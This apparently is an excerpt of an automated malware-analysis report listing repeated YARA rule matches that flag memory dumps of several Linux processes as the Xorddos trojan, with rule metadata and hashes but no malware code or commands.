        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6404.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
